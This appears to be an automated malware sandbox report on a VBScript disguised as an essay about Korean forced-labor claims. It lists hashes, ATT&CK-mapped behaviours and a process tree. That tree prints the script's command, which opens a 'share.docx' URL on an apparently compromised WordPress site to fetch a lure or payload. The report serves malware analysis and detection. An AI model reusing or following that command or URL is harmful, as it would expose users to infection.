ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

General

Target

Essay on Resolution of Korean Forced Labor Claims.vbs
Size

27KB
MD5

75ec9f68a5b62705c115db5119a78134
SHA1

6209f948992fd18d4fc6fc6f89d9815369ac8931
SHA256

ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
SHA512

82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
SSDEEP

384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exe

flow pid process

9 1644 WScript.exe
10 1644 WScript.exe
13 1644 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
9	1644	WScript.exe
10	1644	WScript.exe
13	1644	WScript.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
2092	msedge.exe
2092	msedge.exe
2836	msedge.exe
2836	msedge.exe
3608	msedge.exe
3608	msedge.exe
992	identity_helper.exe
992	identity_helper.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

2836 msedge.exe
2836 msedge.exe
2836 msedge.exe
2836 msedge.exe
2836 msedge.exe
2836 msedge.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.exeexplorer.exemsedge.exe

description	pid	process	target process
PID 1644 wrote to memory of 1956	1644	WScript.exe	cmd.exe
PID 1644 wrote to memory of 1956	1644	WScript.exe	cmd.exe
PID 1956 wrote to memory of 4544	1956	cmd.exe	explorer.exe
PID 1956 wrote to memory of 4544	1956	cmd.exe	explorer.exe
PID 3804 wrote to memory of 2836	3804	explorer.exe	msedge.exe
PID 3804 wrote to memory of 2836	3804	explorer.exe	msedge.exe
PID 2836 wrote to memory of 1372	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 1372	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 764	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 2092	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 2092	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe
PID 2836 wrote to memory of 4864	2836	msedge.exe	msedge.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
2⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\explorer.exe
explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
3⤵
PID:4544

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd42be3cb8,0x7ffd42be3cc8,0x7ffd42be3cd8
3⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
3⤵
PID:764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
3⤵
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
3⤵
PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
3⤵
PID:3740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
3⤵
PID:4348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
3⤵
PID:4268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3936 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
3⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
3⤵
PID:4736

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3852 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2424

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0fcda4fac8ec713700f95299a89bc126

SHA1
576a818957f882dc0b892a29da15c4bb71b93455

SHA256
f7a257742d3a6e6edd16ac8c4c4696d4bdf653041868329461444a0973e71430

SHA512
ab350ca508c412ff860f82d25ac7492afb3baf4a2827249ebc7ec9632ee444f8f0716389f0623afc0756f395cf00d7a90a0f89b360acdf72b1befe34eecb5986

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
21986fa2280bae3957498a58adf62fc2

SHA1
d01ad69975b7dc46eba6806783450f987fa2b48d

SHA256
c91d76b0f27ccea28c4f5f872dee6a98f2d37424ef0b5f188af8c6757090cbb5

SHA512
ae9ba1abe7def7f6924d486a58427f04a02af7dd82aa3a36c1ed527a23ec7897f00b0e30f22529e9599ae2db88e8abc7ba8013b426885aa3c961ee74678455f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
498B

MD5
d9a4069147eda85efebb239ac0ab0b43

SHA1
5f2e5e906d980417b06c1eefd126e35d8b12e754

SHA256
08ae5ab00e602ebfb0fd533ea03eb337942df45fb05ab0e43d3dd7ecb665ba0c

SHA512
a5370396ecbedcce98a3e84af7332ce08d53ff83c0e97ae36ae9f2a98e504104f67208ce006580c2fd29754552b39d74b707b7426b7c88a176979c014b4ed24a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
76b480b2e0e3b42b456223b7a799a34a

SHA1
e9b776fe6f99f3c7bd7f08d0632bd44948ecd807

SHA256
a1992889c9c3d96da3e186d50c6b38e89e35420230f0244bd08987b73dcdf99b

SHA512
afe2c8f586de32b42c92fcfcccf40d21db7f617d6582de12cf6fc86214cce7a1312666958996d3202b15c50e0c6c6c8e1ae88048a8473e866dfbf5f65c6d4b91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
10da995855ecdb5edbd4f16a477330ac

SHA1
378f7a7acaca3da56360719cbca6785f9c176b0c

SHA256
8b4d1eccdf2d5bc04657d5d6a7aac590dde924073076946b6fa25168f0244028

SHA512
a35078caac06185fdcc295eb6a2ce347ee14a53444a4e7363b6dd1cf9c1b71cf9c59b2dde4240ca74c860288042b969b99ece7ff02f4580d8306adee736dc6e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
da7c30b2726c0316742a5836d5ce80b3

SHA1
1323123429abb0856675cce750b147e6c855c162

SHA256
71f575319e2e6289a4950d2655dfdf1bc3894a4627a998d13e529698c0df524c

SHA512
4965e873650d2d6fd16d21c34172144dd5dd69e4d145f3db38d7d56e9baeebe157f38980134cbd4006c0a1ca8f3c9a48817ea38bfe032fa0c2b883a6b31d4ee7

Download Submit
\??\pipe\LOCAL\crashpad_2836_WPVRLYHBSMUEQBGR
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads